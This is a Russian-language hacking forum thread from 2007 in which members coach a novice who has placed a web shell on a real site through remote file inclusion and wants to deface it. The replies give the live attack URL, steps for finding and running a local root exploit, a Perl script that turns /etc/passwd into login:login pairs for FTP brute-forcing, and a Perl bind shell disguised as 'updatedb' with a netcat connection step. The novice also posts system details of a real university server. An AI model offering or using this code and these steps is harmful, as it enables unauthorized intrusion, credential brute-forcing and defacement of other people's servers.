HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.04.2007, 00:22
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

Цитата:
Сообщение от Xszz  
да , да .
Я видел . Шелу на удалённом сервере можно поменять имя на 2ndmenu.
ну закачаешь ты файл 2ndmenu без расширения, и что дальше?
тем более, там в начале "c/".
Цитата:
Сообщение от Xszz  
Вот меня ещё интересует вопрос :
Я нашел удалённый инклуд , подключил шелл http://newxs.narod.ru/shell.txt
Но , ничего не могу с помощью него сделать.
Фалы не изменяются , не закачиваются , папки не создаются.
Как можно зделать дэфэйс ?
Спасибо.
линк в студию
 
Ответить с цитированием

  #2  
Старый 26.04.2007, 00:29
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

chmod 777 /home/site/index.php
Цитата:
ну закачаешь ты файл 2ndmenu без расширения, и что дальше?
он всё равно выполнится как php код = )
Другое дело что там с/ в начале
 
Ответить с цитированием

  #3  
Старый 26.04.2007, 01:30
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
С нами: 10026761

Репутация: 91
По умолчанию

chmod 777 /home/site/index.php

права не меняются я пользуюсь r57shell может есть какой ещё ?
 
Ответить с цитированием

  #4  
Старый 26.04.2007, 01:36
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
С нами: 10026761

Репутация: 91
По умолчанию

http://212.41.0.34/index.php?fl=http://newxs.narod.ru/shell.txt&part=main

Линк взят из раздела "PHP Иньекции"
 
Ответить с цитированием

  #5  
Старый 26.04.2007, 10:10
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

выполняешь uname -a
Смотришь чё тебе выдало, например Linux 2.6.14
идёшь на милворм или в гугл
пишешь Linux 2.6.14 local root exploit
если есть плоенты для этой версии, качаешь его на сервер в папку /tmp и следуешь инструкциям написанным в плоенте =\
Получаешь рута, теперь ты хэкер и король. Делаешь дефейс я пляшешь вокруг него с бубном =\
 
Ответить с цитированием

  #6  
Старый 26.04.2007, 11:24
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
С нами: 10026761

Репутация: 91
По умолчанию

Понял !
Тренируюсь дальше

FreeBSD ns.sibstu.kts.ru 6.2-PRERELEASE FreeBSD 6.2-PRERELEASE #1: Tue Oct 31 18:11:44 KRAT 2006 serg@ns.sibstu.kts.
 
Ответить с цитированием

  #7  
Старый 26.04.2007, 11:39
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
С нами: 10026761

Репутация: 91
По умолчанию

Вот у меня возник ещё один вопрос , если я получаю содержимое файла etc/passwd что мне это даёт ?
 
Ответить с цитированием

  #8  
Старый 26.04.2007, 16:29
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
С нами: 10307906

Репутация: 1365


По умолчанию

Цитата:
Сообщение от Xszz  
Вот у меня возник ещё один вопрос , если я получаю содержимое файла etc/passwd что мне это даёт ?
Можно пропарсить и побрутить FTP на login:login вдруг повезёт.

Вот парсер:
Код:
#!/usr/bin/perl 
$in=$ARGV[0]; 
$out=$ARGV[1]; ## определим параметры скрипта 
exit print "Use $0 $in $out\n" unless ($out); 
open(IN, "$in"); 
open(OUT, ">out"); 
while(<IN>){ 
chomp; 
if (~/sh$/){ ## запишем только валидные аккаунты 
($u,@udef)=split ":"; 
print OUT "$u:$u\n"; ## В виде пары login:login 
} 
} 
close(IN); 
close(OUT);
 
Ответить с цитированием

  #9  
Старый 26.04.2007, 16:53
XENON4IK
Участник форума
Регистрация: 22.04.2007
Сообщений: 135
С нами: 10028281

Репутация: 203
По умолчанию

У меня вот тут возник вопрос...
Есть у меня шелл... залил под фрюху туда эксплойт... А как его запутить то? Сорри за ламерский вопрос=))
 
Ответить с цитированием

  #10  
Старый 26.04.2007, 16:59
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
С нами: 10307906

Репутация: 1365


По умолчанию

Цитата:
Сообщение от XENON4IK  
У меня вот тут возник вопрос...
Есть у меня шелл... залил под фрюху туда эксплойт... А как его запутить то? Сорри за ламерский вопрос=))
Надо пробиндить машину, законектиться с помощью
netcat и скомпилить сплойт.

bind.pl:

Код:
#!/usr/bin/perl

$port = 32767; 
$port = $ARGV[0] if $ARGV[0];
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1)
{
	accept(X, S);
	unless(fork)
	{
		open STDIN, "<&X";
		open STDOUT, ">&X";
		open STDERR, ">&X";
		close X;
		exec("/bin/sh");
	}
	close X;
}
С помощью шелла выполняем команду : perl bind.pl в дире /tmp

конектимся через netcat : 111.111.111.111 3432
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.